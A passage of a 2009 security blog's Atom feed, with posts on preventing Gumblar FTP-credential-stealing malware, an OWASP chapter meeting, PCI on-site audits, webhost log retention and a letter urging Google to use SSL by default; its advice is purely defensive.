href='http://blog.igothacked.com/2009/07/0day-in-cold-fusionbring-them-on.html' title='0day in Cold Fusion.......Bring Them On!'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_GV9ejoAirVk/SlN5Wj91OBI/AAAAAAAAAIA/jUWkMq6IanY/s72-c/Adobe-ColdFusion-CS3-256x256.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-7080425280065886194</id><published>2009-06-29T13:38:00.000-07:00</published><updated>2009-11-10T10:51:24.689-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='FTP hacked'/><category 
scheme='http://www.blogger.com/atom/ns#' term='Gumblar Prevention'/><category scheme='http://www.blogger.com/atom/ns#' term='FTP hack prevention'/><title type='text'>Steps To Prevent Gumblar / Martuz / Nine-Ball</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_GV9ejoAirVk/Skk48ON7uwI/AAAAAAAAAHg/hqSwI-XvnXw/s1600-h/malware.gif"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 253px; height: 320px;" src="http://3.bp.blogspot.com/_GV9ejoAirVk/Skk48ON7uwI/AAAAAAAAAHg/hqSwI-XvnXw/s320/malware.gif" alt="" id="BLOGGER_PHOTO_ID_5352872239366388482" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Now that people are finally starting to notice the huge &lt;a href="http://googleonlinesecurity.blogspot.com/2009/06/top-10-malware-sites.html"&gt;success&lt;/a&gt; of the recent wave of malware that attempts to steal your FTP credentials, I thought I would compile the steps to prevent this type of attack. There has always been a battle between security and convenience, and I truly believe that until this trend dies down, it is crucial for all companies to lean a little more toward the security side of things and just deal with the lack of convenience.&lt;br /&gt;No one is safe from this type of attack, including Bank of America, Cisco, Amazon, and even my own company, McAfee (see &lt;a href="http://www.theregister.co.uk/2009/06/26/ftp_malware_hack/"&gt;link&lt;/a&gt;). The security of your web server now also depends on the security of your employees' workstations and laptops.&lt;br /&gt;&lt;br /&gt;So what can be done to prevent this type of attack? 
It really depends on your server configuration, but there are always steps that can be taken.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 0, 0);font-size:180%;" &gt;&lt;span style="font-weight: bold;"&gt;CLIENT SIDE&lt;/span&gt;&lt;/span&gt;: Let's start by looking at steps that your employees can take to help prevent their workstations from being compromised by the root cause, MALWARE. These are not in any particular order of convenience or security impact.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;1.&lt;/span&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Make sure that your antivirus is up to date&lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; Even though detection rates on these exploits are very low, it is always recommended to have an antivirus installed and to make sure that it is updated regularly. &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;2.&lt;/span&gt;  &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Make sure that you are running &lt;/span&gt;&lt;a style="font-weight: bold; color: rgb(0, 0, 153);" href="http://windowsupdate.microsoft.com/"&gt;Windows Update&lt;/a&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; The more patched your system is, the fewer exploits an attacker has to try against your workstation.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;3.  
&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Make sure you get over to &lt;/span&gt;&lt;a style="font-weight: bold; color: rgb(0, 0, 153);" href="http://www.adobe.com/"&gt;Adobe.com&lt;/a&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt; and update both&lt;span style="color: rgb(0, 0, 153);"&gt; &lt;/span&gt;&lt;/span&gt;&lt;a style="font-weight: bold; color: rgb(0, 0, 153);" href="http://get.adobe.com/flashplayer/otherversions/"&gt;Flash&lt;/a&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt; and &lt;/span&gt;&lt;a style="font-weight: bold; color: rgb(0, 0, 153);" href="http://get.adobe.com/reader/otherversions/"&gt;Acrobat&lt;/a&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; For the most part, these are the exploits that attackers are using to compromise your workstation. They are using exploits that were identified in Flash and Acrobat months ago and have already been patched by Adobe. 
&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;4.&lt;/span&gt;  &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Disable JavaScript in Adobe Reader&lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; Very useful, and for the most part you won't notice that it is disabled.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);font-family:arial;" id="ctl00_MainContentPlaceholder_ctl01_ctl00_lblEntry" &gt;&lt;ul&gt;&lt;li&gt;Click on "Edit" from the file menu bar, then "Preferences."&lt;/li&gt;&lt;li&gt;From the open dialog box, select the "JavaScript" item.&lt;/li&gt;&lt;li&gt;Uncheck "Enable Acrobat JavaScript".&lt;/li&gt;&lt;li&gt;Click "OK".&lt;/li&gt;&lt;/ul&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;5.&lt;/span&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Use a secure FTP client if available&lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; One of the methods attackers use to retrieve your FTP credentials is to sniff your plain-text password when you connect to your FTP server. If you use a secure FTP client, your password will not be sent in plain text. You will want to make sure that your FTP server accepts secure FTP authentication. 
&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;6.&lt;/span&gt;  &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Run an anti-malware program like &lt;/span&gt;&lt;a style="font-weight: bold; color: rgb(0, 0, 153);" href="http://www.malwarebytes.org/"&gt;Malwarebytes&lt;/a&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; This is an awesome application that will attempt to discover whether malware such as Gumblar is infecting your workstation. &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;7.&lt;/span&gt;  &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Change your passwords more frequently&lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; Change your passwords often. This includes your workstation, FTP, cPanel or Bind, etc. There are even settings that will automatically change your FTP credentials daily. 
You might want to utilize this feature until this trend calms down (or forever).&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;8.&lt;/span&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;  &lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Install a client-side firewall that checks for open inbound and outbound connections and alerts you to any changes: An example would be &lt;a style="color: rgb(0, 0, 153);" href="http://www.zonealarm.com/"&gt;ZoneAlarm&lt;/a&gt;&lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; These are extremely annoying but will be beneficial in the long run.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(204, 0, 0);font-size:180%;" &gt;Server Side&lt;/span&gt;:&lt;/span&gt;&lt;/span&gt; Now let's look at server-side modifications that will help prevent Gumblar-based attacks. Once again, in no particular order.&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="color: rgb(51, 255, 51);"&gt;Do you think that your website is a current victim of Gumblar? Step on over to &lt;a href="http://www.unmaskparasites.com"&gt;www.unmaskparasites.com&lt;/a&gt; and find out.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;1.&lt;/span&gt;  &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Install an FTP server that allows secure connections&lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; There are many FTP applications out there that allow the client to connect using a secure connection. For all you know, the FTP server you are using now might already have this feature. 
Check it out.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;2.&lt;/span&gt;  &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Individualize FTP user credentials&lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; Go back and reassess who has credentials. Do they actually need them? If they do, give each person an individual user name. This will help determine where the insecurity is coming from: you will be able to identify which user is compromised and leaking their credentials. &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;3.  &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;IP-restrict your FTP server&lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;: &lt;/span&gt;Create a whitelist of all IP addresses or ranges that currently access your FTP server. Blacklist everything else.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;4.  &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Set up some type of application or routine that checks new or modified files on the server for unauthorized changes&lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; Catch them in the act and prevent them from being able to modify files. 
List your file system by last-modified time and verify that each modification is authorized.&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;5.&lt;/span&gt;  &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Routinely check your FTP log files for unauthorized activity&lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; Grab your FTP log files on a daily or weekly basis and review all inbound connections. Check the IP address of each connection and verify that it is authorized. &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;6.&lt;/span&gt;  &lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(255, 204, 0);"&gt;Make sure that you are running some type of rootkit detection application on a regular basis&lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;&lt;span style="color: rgb(255, 204, 0);"&gt;:&lt;/span&gt; Added protection, 'nuff said.&lt;br /&gt;&lt;span style="color: rgb(255, 0, 0);"&gt;7.&lt;/span&gt;  &lt;span style="color: rgb(255, 204, 0); font-weight: bold;"&gt;Step on over to a site like &lt;/span&gt;&lt;a style="color: rgb(0, 0, 153); font-weight: bold;" href="http://www.unmaskparasites.com/"&gt;Unmaskparasites.com&lt;/a&gt;&lt;span style="color: rgb(255, 204, 0); font-weight: bold;"&gt; and check your site for the current presence of malware. &lt;a style="color: rgb(0, 0, 153);" href="http://wepawet.iseclab.org/"&gt;Wepawet&lt;/a&gt; is another service used for analyzing malware sites. &lt;/span&gt;&lt;span style="color: rgb(153, 153, 153);"&gt;(Quickly identifying malware on your website is something that I would consider damage prevention.)&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;I think I have touched on most of the current methods of prevention. 
Not all of these are necessary, but they will all help with prevention. If you are on a shared server, contact your hosting company and ask what they can do to help you prevent this issue.&lt;br /&gt;Last but not least, if you have any other methods of prevention, let me know.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-7080425280065886194?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/7080425280065886194/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=7080425280065886194' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7080425280065886194'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7080425280065886194'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/06/steps-to-prevent-gumblar-martuz-nine.html' title='Steps To Prevent Gumblar / Martuz / Nine-Ball'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_GV9ejoAirVk/Skk48ON7uwI/AAAAAAAAAHg/hqSwI-XvnXw/s72-c/malware.gif' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-799287146263681387</id><published>2009-06-23T11:07:00.000-07:00</published><updated>2009-06-23T11:41:13.555-07:00</updated><category 
scheme='http://www.blogger.com/atom/ns#' term='Mobile Threats'/><category scheme='http://www.blogger.com/atom/ns#' term='Gumblar'/><category scheme='http://www.blogger.com/atom/ns#' term='OWASP Chapter Meeting'/><title type='text'>First attendance to an OWASP chapter meeting.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_GV9ejoAirVk/SkEgvsMhC7I/AAAAAAAAAF4/boPEfRQpsEA/s1600-h/owaspmeeting+%28Small%29.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="http://3.bp.blogspot.com/_GV9ejoAirVk/SkEgvsMhC7I/AAAAAAAAAF4/boPEfRQpsEA/s320/owaspmeeting+%28Small%29.jpg" alt="" id="BLOGGER_PHOTO_ID_5350593835982457778" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Yesterday, June 22nd, I was able to attend my first ever &lt;a href="http://www.owasp.org/"&gt;OWASP&lt;/a&gt; SF chapter meeting at the SF Federal Reserve. Overall, it was a pretty cool meetup. I really enjoyed that the meeting was at the Federal Reserve building because on entry and exit you really got to see the Reserve's security practices in real time. When we arrived we had to wait for a large enough group to be checked in and escorted to the conference room. They did not take security lightly and even stopped us all and required that we all wear our badges above the waist and visible. Once we were in the conference room, there was the usual IT diet (pizza and soda) and it was somewhat social, which is always cool for networking.&lt;br /&gt;There were two talks presented during the meeting. 
The first talk was presented by Jeremy Brotherton on "Analyzing Web Malware", which I found quite interesting because he went into depth on the exploitation behind the recent trend, Gumblar, which I have previously posted on (&lt;a href="http://blog.igothacked.com/2009/05/botnets-spreading-thier-love-to.html"&gt;here&lt;/a&gt; and &lt;a href="http://blog.igothacked.com/2009/05/how-to-compromise-secure-website.html"&gt;here&lt;/a&gt;). The talk focused on decompiling the Flash file that was used as the method of exploitation for Gumblar, which was very interesting for me since I have never really dived into the actual cause of exploitation.&lt;br /&gt;The second talk was by Dave Maynor on "Threats on the Go-Go, Web Threats to Mobile Devices". This was an eye-opening discussion on mobile devices and the false assumption that all mobile devices are secure. The discussion was very interesting and will definitely motivate me to keep an eye on mobile devices and their current state of security.&lt;br /&gt;&lt;br /&gt;I think it would be beneficial during these meetings to go back to elementary school style and have some time to randomly sit with peers, introduce yourself and talk about current topics. I think that one of the greatest aspects of these meetings is to network and meet other professionals in your field of study. 
Living in Napa, it is quite difficult to meet other security professionals and to sit down and throw ideas back and forth.&lt;br /&gt;&lt;br /&gt;Until the next meeting.&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-799287146263681387?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/799287146263681387/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=799287146263681387' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/799287146263681387'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/799287146263681387'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/06/first-attendance-to-owasp-chapter.html' title='First attendance to an OWASP chapter meeting.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_GV9ejoAirVk/SkEgvsMhC7I/AAAAAAAAAF4/boPEfRQpsEA/s72-c/owaspmeeting+%28Small%29.jpg' height='72' 
width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-7401924179311758625</id><published>2009-06-22T08:57:00.000-07:00</published><updated>2009-06-22T09:45:14.429-07:00</updated><title type='text'>Hackersafe and Scanless PCI trustmark on same Website.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_GV9ejoAirVk/Sj-scDHFXTI/AAAAAAAAAFw/1k1JLjmmDFc/s1600-h/badges.bmp"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 206px; height: 224px;" src="http://3.bp.blogspot.com/_GV9ejoAirVk/Sj-scDHFXTI/AAAAAAAAAFw/1k1JLjmmDFc/s320/badges.bmp" alt="" id="BLOGGER_PHOTO_ID_5350184480210771250" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Got a cool email this weekend from "&lt;a href="http://www.asscert.com/"&gt;The Institute for Application Security Specialists&lt;/a&gt;" announcing the grand opening of their new store loaded with awesome ASS merchandise. 
Now you can let everyone know that you are an ASS by proudly displaying the ASS logo wherever you go.&lt;br /&gt;One thing that caught my eye on their &lt;a href="http://www.cafepress.com/asscert"&gt;store&lt;/a&gt; is the display of both the &lt;a href="http://www.mcafeesecure.com"&gt;McAfee Secure&lt;/a&gt; logo and the &lt;a href="http://www.scanlesspci.com/"&gt;Scanless PCI logo&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;I love it. Even though the McAfee Secure badge is coming from the certification of CafePress, it is still an awesome sight and quite odd.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-7401924179311758625?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/7401924179311758625/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=7401924179311758625' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7401924179311758625'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/7401924179311758625'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/06/hackersafe-and-scanless-pci-trustmark.html' title='Hackersafe and Scanless PCI trustmark on same Website.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' 
url='http://3.bp.blogspot.com/_GV9ejoAirVk/Sj-scDHFXTI/AAAAAAAAAFw/1k1JLjmmDFc/s72-c/badges.bmp' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-990202176410304429</id><published>2009-06-18T09:56:00.001-07:00</published><updated>2009-06-18T10:03:24.541-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PCI Compliance'/><category scheme='http://www.blogger.com/atom/ns#' term='required OnSite Audit'/><category scheme='http://www.blogger.com/atom/ns#' term='a step in the right direction for PCI'/><category scheme='http://www.blogger.com/atom/ns#' term='Level 2 merchant'/><title type='text'>OnSite Audits,  a Go for Level 2 Merchants.</title><content type='html'>In my opinion, a positive step in the direction of PCI compliance has occurred: all Level 2 merchants are now required to have an annual on-site audit conducted in order to obtain their compliance. To me this is a huge step in the security/convenience battle that I believe is having a large impact on PCI being an actual legitimate security solution. Right now MasterCard is the only company that has made this positive change, and it will still need to be enforced, but I am hoping that all will follow suit. 
&lt;br /&gt;&lt;br /&gt;Check the nfo...&lt;a href="http://www.mastercard.com/us/sdp/merchants/merchant_levels.html"&gt;Link&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-990202176410304429?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/990202176410304429/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=990202176410304429' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/990202176410304429'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/990202176410304429'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/06/onsite-audits-go-for-level-2-merchants.html' title='OnSite Audits,  a Go for Level 2 Merchants.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-1852612966615252868</id><published>2009-06-17T08:33:00.000-07:00</published><updated>2009-06-18T10:10:57.377-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Enable Logging'/><category scheme='http://www.blogger.com/atom/ns#' term='Nine-Ball'/><category scheme='http://www.blogger.com/atom/ns#' term='Gumblar'/><category scheme='http://www.blogger.com/atom/ns#' term='Log Analysis'/><category scheme='http://www.blogger.com/atom/ns#' 
term='Enable FTP logging'/><title type='text'>Dear Webhost,  Please enable Logging.  Thank You.</title><content type='html'>Working with compromised accounts that have fallen victim to the recent trend of Gumblar and Nine-Ball, I am noticing that there are a lot of web hosting companies that do not have logging enabled. They will either have raw web access logs enabled with one day's worth of retention (absolutely useless), or none at all. So with that being said:&lt;br /&gt;&lt;br /&gt;Webhosts, please enable logging.&lt;br /&gt;Please allow log retention of at least 1 year.&lt;br /&gt;Please enable FTP logging.&lt;br /&gt;&lt;br /&gt;&lt;a href="https://www.pcisecuritystandards.org/security_standards/pci_dss_download.html"&gt;PCI DSS Requirement 10.7&lt;/a&gt; asks that you retain audit trail history for at least one year, with a minimum of three months immediately available for analysis. The entirety of Section 10 of the requirements is devoted to audit trails and the storage of log files. This is crucial to any analysis of the web server. 
If you are not retaining log files, then you are not running a PCI compliant hosting environment, bottom line.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-1852612966615252868?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/1852612966615252868/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=1852612966615252868' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/1852612966615252868'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/1852612966615252868'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/06/dear-webhost-please-enable-logging.html' title='Dear Webhost,  Please enable Logging.  
Thank You.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-1281981165310007303</id><published>2009-06-16T09:29:00.000-07:00</published><updated>2009-06-18T15:36:20.124-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Letter To Google'/><category scheme='http://www.blogger.com/atom/ns#' term='Google and SSL'/><category scheme='http://www.blogger.com/atom/ns#' term='The A-Team of Security'/><title type='text'>How many Security Professionals does it Take to tell Google that it could be more secure?</title><content type='html'>And the answer is... 37. You can put 37 different security gurus into one room and I can almost guarantee that if you bring up any current security topic, you will always hear pros and cons on each side of the story and its actual impact from a security standpoint. Give these professionals the topic of making services within Google such as Gmail default to high levels of encryption via SSL, and you have a unanimous agreement (it's a no-brainer). That is what occurred in sending a &lt;a href="http://www.wired.com/images_blogs/threatlevel/2009/06/google-letter-final2.pdf"&gt;letter&lt;/a&gt; over to Google, to which Google responded the very same day on their &lt;a href="http://googleonlinesecurity.blogspot.com/"&gt;blog&lt;/a&gt;. To me, that is making an impact: you are making Google consider decisions that will affect a lot of users and have a large impact on the overall security of the internet. 
I can justify that statement, given that anything Google does could in some way impact the entire status of the internet.&lt;br /&gt;&lt;br /&gt;Pretty cool stuff.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1732826304675968996-1281981165310007303?l=blog.igothacked.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/1281981165310007303/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=1281981165310007303' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/1281981165310007303'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/1281981165310007303'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/06/how-many-security-professionals-does-it.html' title='How many Security Professionals does it Take to tell Google that it could be more secure?'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-7997648252510977710</id><published>2009-06-15T14:39:00.001-07:00</published><updated>2009-06-15T16:10:09.851-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Security Twits'/><category scheme='http://www.blogger.com/atom/ns#' term='Twitter'/><category scheme='http://www.blogger.com/atom/ns#' term='July: Month of Twitter Bugs'/><category 
